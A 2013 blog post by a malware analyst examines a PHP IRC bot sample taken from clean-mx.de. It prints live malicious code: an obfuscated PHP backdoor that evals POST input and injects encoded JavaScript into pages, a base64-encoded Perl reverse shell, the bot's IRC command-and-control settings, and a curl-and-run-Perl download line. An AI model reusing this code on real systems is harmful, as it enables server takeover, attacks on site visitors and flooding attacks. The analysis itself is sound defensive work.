Irregular Expressions

Apr 28 2013   2:43AM GMT

Looking For Samples?

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Practice is always good.  There is a few sites a look at when I am looking for things to analyze, one that always seems to have something for me to look at is clean-mx.de. I just pulled what looks like a PHP bot off of one of the database entries. I post a snippet below.


^JaVa Coder^ shell v2.0 ^Ojo Dumeh^

body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}

<?
$dir = @getcwd();
echo "JaVa Coder 
";
$OS = @PHP_OS;
echo "OSTYPE :$OS 
";
echo "uname -a; $uname 
";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {

One thing I look for in these bots is URL’s / IP’s and Base64 encoded stuff. We have both in this sample, two Base64;


<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlNzZhfnIjIGBhPywlNjklMkMjJTVGYCUzQmk9PyIlMzclMzYjJTJFfDEkJTM2JTMzfCUyRT8iOyQlNjF+JTNEJTVCIiUzNzglMkUxJTM1NyMlMkV+JTMxPyUzNCUzMiUyRT81OCMiJCUyQyU2OSQlMkIlMjI/JTMxfDQlMzF8LiUzM2A1IixpK34iMSQlMzk/MS4xMyElMzIiJTVEQDslNUZ8PTElM0IkJTY5JCU2NiQlMjgjZCU2RmAlNjMjdX5tfGUhJTZFJTc0LiFjb3xvYGtpPyU2NS5tYSU3NEBjJTY4YChALyMlNUMlNjIlNjghZyMlNjZgJTc0fCUzRDEvKSUzRH49IyU2RXUjbCU2Q2ApQGZvcn4oYCU2OSQlM0QlMzAlM0IlNjlAJTNDMyUzQiU2OSUyQiMlMkIjKSQlNjQjbyU2MyN1fm1+JTY1YCU2RSU3NC5+JTc3ciNpPyU3NCU2NXwlMjgiQCUzQ35zY3xyP2klNzAjJTc0QCUzRXwlNjkjZn4lMjh+XyMlMjlkJCU2RiElNjN8JTc1YG1lfiU2RXQkJTJFJTc3JTcyJTY5JTc0QCU2NSUyOEAlNUMiQCUzQyMlNzMlNjMlNzIlNjlwJTc0fiBAaWQ/JTNEJTVGJTIyJTJCQGklMkIjIl9gIHMhcmMjPX4vQC9gIn4rPyU2MX5baT8lNUQlMkIiJTJGY34lNzAvJTNFJTNDQCU1QyMlNUNAJTJGJTczJCU2Mz9yJTY5ISU3MGAlNzQhJTNFfCU1QyUyMiMpIyUzQyU1QyUyRiU3MyFjP3IlNjkjcGB0JTNFfiUyMkAlMjkjOycpLnJlcGxhY2UoL2B8XCF8I3xcfHxcJHxcP3xAfH4vZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i

And


$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";

We have what looks to be the IRC C&C.

class pBot
{
var $config = array("server"=>"106.187.97.158",
"port"=>"7000",
"pass"=>"toni",
"prefix"=>"Ddoser",
"maxrand"=>"4",
"chan"=>"#FBI",
"chan2"=>"#CIA",
"key"=>"toni",
"modes"=>"+ps",
"password"=>"toni",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost scanner.crew)

We also have a URL to check out.


<?
$url="http://ircq.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild2.txt;perl mild2.txt;rm -rf mild2.txt*;');

And it looks like we got another bot to look at in mild2.txt.


#!/usr/bin/perl
#
# What is New in V2.3 ? :
#
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!bot @portscan
#!bot @nmap
#!bot @back
#!bot @udpflood
#!bot @tcpflood
#!bot @httpflood
#!bot @linuxhelp
#!bot @hajar
#!bot @system
#!bot @milw0rm
#!bot @logcleaner
#!bot @sendmail
#!bot @join
#!bot @part
#!bot @help
#!bot cd tmp for example
#!bot !eval

It also uses the same IRC server.


$servidor='106.187.97.158' unless $servidor;
my $porta='7000';

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to:

Share this item with your network: